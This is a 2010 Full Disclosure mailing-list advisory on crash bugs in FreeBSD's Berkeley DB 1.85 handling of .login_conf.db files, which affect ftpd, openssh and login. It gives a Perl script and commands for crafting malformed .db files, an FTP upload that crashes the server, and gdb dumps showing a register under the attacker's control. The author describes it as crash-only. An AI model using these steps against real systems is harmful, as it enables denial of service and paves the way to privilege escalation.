Full Disclosure mailing list archives

FreeBSD stock ftpd vulnerabilities (and more)


From: "HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>
Date: Tue, 10 Aug 2010 04:11:46 +0200

FreeBSD stock ftpd vulnerabilities (and more)

Currently this is crash only.

Also see the attachment.

More at @ http://isowarez.de/ lewls

Cheers /Kingcope

.login_conf.db vulnerabilities (FreeBSD Berkeley DB 1.85)
affects stock ftpd, openssh, /usr/bin/login
-----------------------------------------------------------

perl program to create the .db files and play with:

use DB_File;

my $db = tie %hash, 'DB_File', "test.db", O_CREAT | O_TRUNC | O_RDWR,
DEFFILEMODE, $DB_HASH ;

$a = "A" x 10100;

$db->put("test", "$a");
$db->sync();
$db->fd();
------------------------------------------------------------------------------------------------------------------

one db file was created using OpenBSD like so:
perl -e 'print "me:\\\n:" . "A" x 100000 . "=" . "A:"' > .login_conf
then using vi put a tab before the :AAAA...A's after the me:\n
then do:
cap_mkdb .login_conf

you cannot use freebsd“s cap_mkdb because it has a strcpy buffer overflow
when parsing this file, OpenBSD does not :>

------------------------------------------------------------------------------------------------------------------

%uname -a;
FreeBSD r00tbox0wned.Belkin 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16
04:18:52 UTC 2008
root () dessler cse buffalo edu:/usr/obj/usr/src/sys/GENERIC
i386

.login_conf_suspect.db


C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
ftp> bin
200 Type set to I.
ftp> put Desktop/.login_conf_suspect.db .login_conf.db
200 PORT command successful.
150 Opening BINARY mode data connection for '.login_conf.db'.
226 Transfer complete.
ftp: 180224 bytes sent in 0,04Seconds 4870,92Kbytes/sec.
ftp> quit
221 Goodbye.

C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
Connection closed by remote host.

C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:

%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 668
Attaching to program: /usr/libexec/ftpd, process 668
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2       RSYSCALL(read)
Current language:  auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x28192463 in collect_data (hashp=0x8061400, bufp=0x805f400, len=44900,
set=0)
    at /var/src/lib/libc/db/hash/hash_bigkey.c:492
492                     xbp = __get_buf(hashp, bp[bp[0] - 1], bufp, 0);
Current language:  auto; currently c
(gdb) i r
eax            0xffff   65535                < OUR VALUE
ecx            0x0      0
edx            0xffff1001       -61439
ebx            0x281b4960       672876896
esp            0xbfbfc228       0xbfbfc228
ebp            0xbfbfc258       0xbfbfc258
esi            0x8061400        134616064
edi            0x8088000        134774784
eip            0x28192463       0x28192463
eflags         0x10286  66182
cs             0x33     51
ss             0x3b     59
ds             0x3b     59
es             0x3b     59
fs             0x3b     59
gs             0x1b     27
(gdb)
(gdb) x/10i $eip
0x28192463 <collect_data+71>:   movzwl 0xfffffffe(%edi,%eax,2),%eax
0x28192468 <collect_data+76>:   push   %eax
0x28192469 <collect_data+77>:   push   %esi
0x2819246a <collect_data+78>:   call   0x2810007c <_init+148>
0x2819246f <collect_data+83>:   add    $0x10,%esp
0x28192472 <collect_data+86>:   test   %eax,%eax
0x28192474 <collect_data+88>:   mov    %eax,%edx
0x28192476 <collect_data+90>:   je     0x28192594 <collect_data+376>
0x2819247c <collect_data+96>:   sub    $0x8,%esp
0x2819247f <collect_data+99>:   pushl  0xc(%ebp)
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc260:
 eip = 0x28192463 in collect_data
    (/var/src/lib/libc/db/hash/hash_bigkey.c:492); saved eip 0x28192490
 called by frame at 0xbfbfc2a0
 source language c.
 Arglist at 0xbfbfc258, args: hashp=0x8061400, bufp=0x805f400, len=44900,
set=0
 Locals at 0xbfbfc258, Previous frame's sp is 0xbfbfc260
 Saved registers:
  ebx at 0xbfbfc24c, ebp at 0xbfbfc258, esi at 0xbfbfc250, edi at
0xbfbfc254,
  eip at 0xbfbfc25c
(gdb)

---------------------------------------------------------------------------------------

__getbuf_crash_suspicious.db


%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 680
Attaching to program: /usr/libexec/ftpd, process 680
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2       RSYSCALL(read)
Current language:  auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79              rep
(gdb)
Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79              rep
(gdb) i r
eax            0x5ff82  393090
ecx            0x3      3
edx            0x3      3
ebx            0x281b4960       672876896
esp            0xbfbfc544       0xbfbfc544
ebp            0xbfbfc578       0xbfbfc578
esi            0x28096348       671703880
edi            0x5ff82  393090
eip            0x281a436d       0x281a436d
eflags         0x10206  66054
cs             0x33     51
ss             0x3b     59
ds             0x3b     59
es             0x3b     59
fs             0x3b     59
gs             0x1b     27
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc550:
 eip = 0x281a436d in memcpy (/var/src/lib/libc/i386/string/bcopy.S:79);
    saved eip 0x281869fe
 called by frame at 0xbfbfc580
 source language asm.
 Arglist at 0xbfbfc548, args:
 Locals at 0xbfbfc548, Previous frame's sp is 0xbfbfc550
 Saved registers:
  esi at 0xbfbfc544, edi at 0xbfbfc540, eip at 0xbfbfc54c
(gdb)
(gdb) x/10i $eip
0x281a436d <memcpy+37>: repz movsb %ds:(%esi),%es:(%edi)
0x281a436f <memcpy+39>: pop    %edi
0x281a4370 <memcpy+40>: pop    %esi
0x281a4371 <memcpy+41>: ret
0x281a4372 <memcpy+42>: add    %ecx,%edi
0x281a4374 <memcpy+44>: add    %ecx,%esi
0x281a4376 <memcpy+46>: std
0x281a4377 <memcpy+47>: mov    %ecx,%edx
0x281a4379 <memcpy+49>: and    $0x3,%ecx
0x281a437c <memcpy+52>: dec    %edi
(gdb)
---------------------------------------------------------------------------------------

cgetent_crash_suspicious.db

looks like this is outside of the Berkeley DB 1.85 code.

localhost# uname -a;
FreeBSD localhost.Belkin 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Mon Oct 27
17:51:09 GMT 2003
root () freebsd-stable sentex ca:/usr/obj/usr/src/sys/GENERIC
i386

doesnt work on 6.3

localhost# ps aux | grep ftpd
root    161  0.0  0.3  1016  344  p0  R+    9:04PM   0:00.01 grep ftpd
root    150  0.0  0.9  1420 1088  ??  Is    9:03PM   0:00.02 ftpd:
192.168.2.15
localhost# gdb /usr/libexec/ftpd
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) attach 150
Attaching to program: /usr/libexec/ftpd, process 150
Reading symbols from /usr/lib/libskey.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols
found)...
done.
Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libm.so.2...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols
found)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols
found)...
done.
0x28146c44 in read () from /usr/lib/libc.so.4
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x2810da81 in cgetent () from /usr/lib/libc.so.4
(gdb) i r
eax            0x0      0
ecx            0xfffffff3       -13
edx            0x807cff4        134729716
ebx            0x281522ec       672473836
esp            0xbfbfdf08       0xbfbfdf08
ebp            0xbfbfe480       0xbfbfe480
esi            0xbfbfe380       -1077943424
edi            0x807d000        134729728
eip            0x2810da81       0x2810da81
eflags         0x10246  66118
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) x/10i $eip
0x2810da81 <cgetent+513>:       repnz scas %es:(%edi),%al
0x2810da83 <cgetent+515>:       mov    %ecx,%esi
0x2810da85 <cgetent+517>:       not    %esi
0x2810da87 <cgetent+519>:       lea    0xffffffff(%esi),%edx
0x2810da8a <cgetent+522>:       mov    %edx,0xfffffad4(%ebp)
0x2810da90 <cgetent+528>:       add    $0xfffffff4,%esp
0x2810da93 <cgetent+531>:       push   %esi
0x2810da94 <cgetent+532>:       call   0x280dd8a4 <_init+2316>
0x2810da99 <cgetent+537>:       mov    %eax,%edi
0x2810da9b <cgetent+539>:       add    $0xfffffffc,%esp
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfe480:
 eip = 0x2810da81 in cgetent; saved eip 0x2810d8ae
 called by frame at 0xbfbfe4c0
 Arglist at 0xbfbfe480, args:
 Locals at 0xbfbfe480, Previous frame's sp is 0x0
 Saved registers:
  ebx at 0xbfbfe468, ebp at 0xbfbfe480, eip at 0xbfbfe484
(gdb)

I am sure there are more places where it might crash. Just modify the values
of the .db files in
a hex editor and check it out.

Attachment: FreeBSD.zip
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: